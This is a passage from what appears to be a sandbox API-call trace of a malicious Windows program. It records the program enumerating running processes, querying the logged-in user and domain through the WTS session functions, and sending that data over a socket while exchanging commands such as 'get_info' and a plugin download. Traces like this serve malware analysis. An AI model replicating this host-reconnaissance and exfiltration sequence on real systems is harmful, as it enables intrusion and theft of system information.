dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0046.334] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x516fe10 | out: lpSystemTimeAsFileTime=0x516fe10*(dwLowDateTime=0x14745ba0, dwHighDateTime=0x1d357fe)) [0046.335] wcslen (_String="") returned 0x0 [0046.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0046.335] wcslen (_String="System") returned 0x6 [0046.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0046.335] wcslen (_String="smss.exe") returned 0x8 [0046.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0046.336] wcslen (_String="csrss.exe") returned 0x9 [0046.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0046.336] wcslen (_String="wininit.exe") returned 0xb [0046.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.336] wcslen (_String="csrss.exe") returned 0x9 [0046.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0046.336] wcslen (_String="winlogon.exe") returned 0xc [0046.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0046.337] wcslen (_String="services.exe") returned 0xc [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0046.337] wcslen (_String="lsass.exe") returned 0x9 [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0046.337] wcslen (_String="lsm.exe") returned 0x7 [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lsm.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0046.337] wcslen (_String="svchost.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="svchost.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="svchost.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="svchost.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="svchost.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="audiodg.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="svchost.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="svchost.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="spoolsv.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="svchost.exe") returned 0xb [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.337] wcslen (_String="taskhost.exe") returned 0xc [0046.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="taskhost.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0046.338] wcslen (_String="dwm.exe") returned 0x7 [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0046.338] wcslen (_String="explorer.exe") returned 0xc [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0046.338] wcslen (_String="taskeng.exe") returned 0xb [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="taskeng.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.338] wcslen (_String="taskeng.exe") returned 0xb [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="taskeng.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.338] wcslen (_String="taskhost.exe") returned 0xc [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="taskhost.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0046.338] wcslen (_String="centres_cole_represented.exe") returned 0x1c [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="centres_cole_represented.exe", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0046.338] wcslen (_String="magnitude-agencies-signatures-injured.exe") returned 0x29 [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="magnitude-agencies-signatures-injured.exe", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0046.338] wcslen (_String="shut_canal_sao_rules.exe") returned 0x18 [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shut_canal_sao_rules.exe", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0046.338] wcslen (_String="knife contents accounting.exe") returned 0x1d [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="knife contents accounting.exe", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0046.338] wcslen (_String="peaceful demo.exe") returned 0x11 [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="peaceful demo.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0046.338] wcslen (_String="dispatched_catalogue_successfully.exe") returned 0x25 [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dispatched_catalogue_successfully.exe", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0046.338] wcslen (_String="mba.exe") returned 0x7 [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mba.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0046.338] wcslen (_String="floating_potatoes.exe") returned 0x15 [0046.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="floating_potatoes.exe", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0046.338] wcslen (_String="savage-lady-trust.exe") returned 0x15 [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="savage-lady-trust.exe", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0046.339] wcslen (_String="clouds opens sept oct.exe") returned 0x19 [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clouds opens sept oct.exe", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0046.339] wcslen (_String="innsdiscuss.exe") returned 0xf [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="innsdiscuss.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0046.339] wcslen (_String="recycling.exe") returned 0xd [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="recycling.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0046.339] wcslen (_String="literally-severe-happen.exe") returned 0x1b [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="literally-severe-happen.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0046.339] wcslen (_String="content_depend.exe") returned 0x12 [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content_depend.exe", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0046.339] wcslen (_String="approach-pe-asia.exe") returned 0x14 [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="approach-pe-asia.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0046.339] wcslen (_String="jul.exe") returned 0x7 [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jul.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0046.339] wcslen (_String="courier.exe") returned 0xb [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="courier.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0046.339] wcslen (_String="webcam.exe") returned 0xa [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webcam.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0046.339] wcslen (_String="guiltyfederationreceptorlatex.exe") returned 0x21 [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="guiltyfederationreceptorlatex.exe", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0046.339] wcslen (_String="trout wellness instead.exe") returned 0x1a [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trout wellness instead.exe", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0046.339] wcslen (_String="kenny.exe") returned 0x9 [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kenny.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0046.339] wcslen (_String="pST790mv.exe") returned 0xc [0046.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pST790mv.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0046.339] LoadLibraryA (lpLibFileName="Wtsapi32.dll") returned 0x746b0000 [0046.340] GetProcAddress (hModule=0x746b0000, lpProcName="WTSQuerySessionInformationW") returned 0x746b253d [0046.340] GetProcAddress (hModule=0x746b0000, lpProcName="WTSFreeMemory") returned 0x746b1b65 [0046.340] GetProcAddress (hModule=0x746b0000, lpProcName="WTSEnumerateSessionsW") returned 0x746b1d49 [0046.340] WTSEnumerateSessionsW (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x516fdd4, pCount=0x516fdd8 | out: ppSessionInfo=0x516fdd4, pCount=0x516fdd8) returned 1 [0046.342] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x0, WTSInfoClass=0x5, ppBuffer=0x516fdb8, pBytesReturned=0x516fdb4 | out: ppBuffer=0x516fdb8*="", pBytesReturned=0x516fdb4) returned 1 [0046.342] WTSFreeMemory (pMemory=0x591210) [0046.342] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x0, WTSInfoClass=0x7, ppBuffer=0x516fdb8, pBytesReturned=0x516fdb4 | out: ppBuffer=0x516fdb8*="", pBytesReturned=0x516fdb4) returned 1 [0046.342] WTSFreeMemory (pMemory=0x591210) [0046.342] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x0, WTSInfoClass=0x10, ppBuffer=0x516fdb8, pBytesReturned=0x516fdb4 | out: ppBuffer=0x516fdb8*="", pBytesReturned=0x516fdb4) returned 1 [0046.342] WTSFreeMemory (pMemory=0x591210) [0046.342] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x5, ppBuffer=0x516fdb8, pBytesReturned=0x516fdb4 | out: ppBuffer=0x516fdb8*="5p5NrGJn0jS HALPmcxz", pBytesReturned=0x516fdb4) returned 1 [0046.342] wcslen (_String="5p5NrGJn0jS HALPmcxz") returned 0x14 [0046.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5p5NrGJn0jS HALPmcxz", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0046.343] WTSFreeMemory (pMemory=0x666920) [0046.343] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x7, ppBuffer=0x516fdb8, pBytesReturned=0x516fdb4 | out: ppBuffer=0x516fdb8*="XDUWTFONO", pBytesReturned=0x516fdb4) returned 1 [0046.343] wcslen (_String="XDUWTFONO") returned 0x9 [0046.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XDUWTFONO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0046.343] WTSFreeMemory (pMemory=0x588ef0) [0046.343] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x10, ppBuffer=0x516fdb8, pBytesReturned=0x516fdb4 | out: ppBuffer=0x516fdb8*="", pBytesReturned=0x516fdb4) returned 1 [0046.343] WTSFreeMemory (pMemory=0x591210) [0046.343] FreeLibrary (hLibModule=0x746b0000) returned 1 [0046.343] WSASend (in: s=0x214, lpBuffers=0x516fd74*=((len=0x7e7, buf=0x2636328*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd74*=((len=0x7e7, buf=0x2636328*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0046.350] GetCurrentThreadId () returned 0xac0 [0046.350] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0046.350] GetLastError () returned 0x3e5 [0046.350] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.350] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.372] GetCurrentThreadId () returned 0xac0 [0046.372] WSASend (in: s=0x214, lpBuffers=0x516fef0*=((len=0x4c, buf=0x2621400*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fef0*=((len=0x4c, buf=0x2621400*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0046.372] SetEvent (hEvent=0x278) returned 1 [0046.372] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.372] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.622] strlen (_Str="get_info.plug") returned 0xd [0046.622] strlen (_Str="dl") returned 0x2 [0046.622] WSASend (in: s=0x214, lpBuffers=0x516fce8*=((len=0x3f, buf=0x261fd60*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fce8*=((len=0x3f, buf=0x261fd60*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0046.623] strlen (_Str="get_info") returned 0x8 [0046.623] strlen (_Str="get_info") returned 0x8 [0046.623] strlen (_Str="") returned 0x0 [0046.623] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0046.623] GetLastError () returned 0x3e5 [0046.623] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.623] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x5e, buf=0x26268a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x5e, buf=0x26268a8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0046.623] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.623] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.858] WSARecv (in: s=0x214, lpBuffers=0x516fee8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fee8*=((len=0x2800, buf=0x260a190*)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned 0 [0046.858] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.859] WSARecv (in: s=0x214, lpBuffers=0x516fee8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fee8*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0046.859] GetLastError () returned 0x3e5 [0046.859] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.087] WSASend (in: s=0x214, lpBuffers=0x516fd3c*=((len=0x2c, buf=0x2620c38*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd3c*=((len=0x2c, buf=0x2620c38*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.087] GetCurrentThreadId () returned 0xac0 [0047.087] WSARecv (in: s=0x214, lpBuffers=0x516fe60, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fe60*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0047.087] GetLastError () returned 0x3e5 [0047.087] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.087] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.318] strlen (_Str="get_info") returned 0x8 [0047.318] strlen 